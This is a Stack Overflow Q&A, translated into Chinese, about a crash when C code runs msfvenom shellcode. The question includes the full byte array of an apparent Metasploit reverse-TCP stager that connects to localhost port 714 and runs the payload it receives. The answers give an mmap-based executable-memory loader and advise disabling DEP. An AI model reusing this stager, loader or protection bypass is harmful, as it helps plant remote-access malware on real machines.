【问题标题】:C shellcode execution issueC shellcode执行问题
【发布时间】:2016-09-03 15:19:40
【问题描述】:

我最近对 ​​Metasploit 产生了兴趣,并试图从 C 代码中执行一些 shellcode。

所以我用 msfvenom 为 LHOST = 127.0.0.1 和 LPORT = 714 生成了一个 shellcode(所以如果你想运行 shellcode,没有问题,因为 localhost)并选择了 C 格式的输出。

然后我发现了这个:http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/ 还有这个:http://www.sevagas.com/?Hide-meterpreter-shellcode-in-executable

所以我做了什么:

#include <stdio.h>

char code[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x7f\x00\x00\x01\x68\x02"
"\x00\x02\xca\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";

int main(int argc, char **argv) {
    int(*func) ();
    func = (int(*) ()) code;
    (int)(*func) ();    
}

编译它,启动它..然后崩溃....

Exception non gérée à 0x00338000 dans Shellcode.exe:0xC0000005: Violation d'accès lors de l'exécution à l'emplacement 0x00338000.

崩溃发生在这里:(int)(*func) ();

由于我不太了解程序试图做什么(我对 C 很陌生),我不知道问题出在哪里。是我的 shellcode 还是它的方式叫什么?

有人有一些关于在 C/C++ 中执行 shellcode 的文档吗? 谢谢大家的帮助。

【问题讨论】:

  • 1) 没有“C/C++”语言,只有两种不同的语言C和C++! 2) 这显然是 C。 3) 你调用 undefined 行为。 4) 见How to Ask,这不是“解释代码”网站。
  • “因为我不太明白程序要做什么(我对 C 很陌生),” - 是否值得先学习 C 语言?
  • 所以你想破解你不懂的语言?
  • @Olaf,1) 我知道有 2 种不同的语言,我接受这两种语言的答案。 2)是的,它是 3)最后一行是调用未定义的行为,是吗? 4) 好的,谢谢,我会检查的。
  • @Serge 我有基础知识,通常要从一段我不理解的代码开始学习,我会在学习的同时尝试复制/改进它。这是我以前从未尝试过的东西..

标签: c crash shellcode


【解决方案1】:

您遇到分段错误,因为内存未标记为可执行。

#include <unistd.h>
#include <sys/mman.h>
#include <string.h>

void *buf;

/* copy code to executable buffer */    
buf = mmap (0,sizeof(code),PROT_READ|PROT_WRITE|PROT_EXEC,
              MAP_PRIVATE|MAP_ANON,-1,0);
memcpy (buf, code, sizeof(code));

/* run code */
int i = ((int (*) (void))buf)();
printf("Return value [%d]\n", i);

【讨论】:

    【解决方案2】:

    字节代表机器指令。在普通机器上,内存被分成不同的内存段,code 通常会进入一个 data 段。来电:

    int(*func) ();
    func = (int(*) ()) code;
    (int)(*func) ();
    

    尝试执行这些字节中包含的代码。

    但是,现代操作系统通常默认提供保护,防止执行位于并非为代码执行而设计的内存段中的代码(例如,参见 here)。你必须配置你的编译器来禁用它。

    【讨论】:

    • 感谢您的回答,我实际上无法投票。所以这个调用正在修改堆栈,对吗?我已经使用 /GS- 选项禁用了 VS2013 上的一些安全性,但似乎这还不够。我读了你的维基百科文章,我回来了
    • 1) C 不需要堆栈 2) 静态变量通常存储在堆栈中。 3) 野性转换调用 UB,即它不是由 C 语言定义的
    • @Olaf:感谢 2),我确实错过了 code 的存储时间。 ;) 至于 1),只要你在这里只坚持 C 标准,你就不会带来有趣的答案。
    • 1) 如果没有堆栈,它是如何工作的? 2)我听说过不同的部分(数据,文本,...),这与堆栈和静态变量之间是否存在“链接”,或者它完全是题外话?
    • 编辑:刚刚禁用了 DEP,它似乎可以工作.. 非常感谢,我将继续学习这些保护和 C 以及您在此讨论中谈到的所有内容
    猜你喜欢
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    • 2017-11-02
    • 1970-01-01
    • 1970-01-01
    • 2019-02-19
    • 1970-01-01
    • 1970-01-01
    相关资源
    最近更新 更多